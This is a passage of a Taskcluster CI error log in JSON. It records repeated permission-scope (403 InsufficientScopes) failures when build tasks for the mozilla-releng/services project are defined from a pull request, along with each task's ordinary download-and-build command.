\\\"e1709c4adee67189246467e7e2c02f9bba8b99fa\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T12:36:13.587Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T12:36:13.587Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"ehR-C2bOT8C9yukWOo_eAA\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T12:36:13.587Z\\\"\\n}\\n  time:     2016-09-23T12:36:13.710Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"UBlZKxl6QGC-nez1IgHo8Q\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"shipit_dashboard\",\n                        \"description\": \"Test, build and deploy shipit_dashboard\",\n                        \"owner\": \"bastien@nextcairn.com\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/shipit_dashboard\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"shipit_dashboard\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"pull_request.synchronize\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 59,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-releng\",\n                            \"GITHUB_BASE_SHA\": \"c70e3321a3d31f95036588c14dfafc3a0ea581f3\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/La0/mozilla-relengapi.git\",\n                            \"GITHUB_HEAD_USER\": \"La0\",\n                            \"GITHUB_HEAD_SHA\": \"e1709c4adee67189246467e7e2c02f9bba8b99fa\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"bastien@nextcairn.com\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T12:36:13.587Z\",\n                    \"deadline\": \"2016-09-24T12:36:13.587Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"ehR-C2bOT8C9yukWOo_eAA\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T12:36:13.587Z\"\n                },\n                \"time\": \"2016-09-23T12:36:13.710Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"IRH6Z9o8SZ-mWTYV5XsxiA\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_docs\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_docs\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_docs\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_docs\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"e1709c4adee67189246467e7e2c02f9bba8b99fa\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T12:36:13.586Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T12:36:13.586Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"ehR-C2bOT8C9yukWOo_eAA\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T12:36:13.586Z\\\"\\n}\\n  time:     2016-09-23T12:36:13.712Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"IRH6Z9o8SZ-mWTYV5XsxiA\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_docs\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_docs\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_docs\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_docs\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"e1709c4adee67189246467e7e2c02f9bba8b99fa\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T12:36:13.586Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T12:36:13.586Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"ehR-C2bOT8C9yukWOo_eAA\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T12:36:13.586Z\\\"\\n}\\n  time:     2016-09-23T12:36:13.712Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"IRH6Z9o8SZ-mWTYV5XsxiA\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"releng_docs\",\n                        \"description\": \"Test, build and deploy releng_docs\",\n                        \"owner\": \"bastien@nextcairn.com\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/releng_docs\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"releng_docs\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"pull_request.synchronize\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 59,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-releng\",\n                            \"GITHUB_BASE_SHA\": \"c70e3321a3d31f95036588c14dfafc3a0ea581f3\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/La0/mozilla-relengapi.git\",\n                            \"GITHUB_HEAD_USER\": \"La0\",\n                            \"GITHUB_HEAD_SHA\": \"e1709c4adee67189246467e7e2c02f9bba8b99fa\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"bastien@nextcairn.com\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T12:36:13.586Z\",\n                    \"deadline\": \"2016-09-24T12:36:13.586Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"ehR-C2bOT8C9yukWOo_eAA\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T12:36:13.586Z\"\n                },\n                \"time\": \"2016-09-23T12:36:13.712Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"eRiYPzMyR3mGe35V3yMADw\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_frontend\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"e1709c4adee67189246467e7e2c02f9bba8b99fa\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T12:36:13.587Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T12:36:13.587Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"ehR-C2bOT8C9yukWOo_eAA\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T12:36:13.587Z\\\"\\n}\\n  time:     2016-09-23T12:36:13.715Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"eRiYPzMyR3mGe35V3yMADw\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_frontend\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"e1709c4adee67189246467e7e2c02f9bba8b99fa\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T12:36:13.587Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T12:36:13.587Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"ehR-C2bOT8C9yukWOo_eAA\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T12:36:13.587Z\\\"\\n}\\n  time:     2016-09-23T12:36:13.715Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"eRiYPzMyR3mGe35V3yMADw\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"releng_frontend\",\n                        \"description\": \"Test, build and deploy releng_frontend\",\n                        \"owner\": \"bastien@nextcairn.com\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/releng_frontend\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        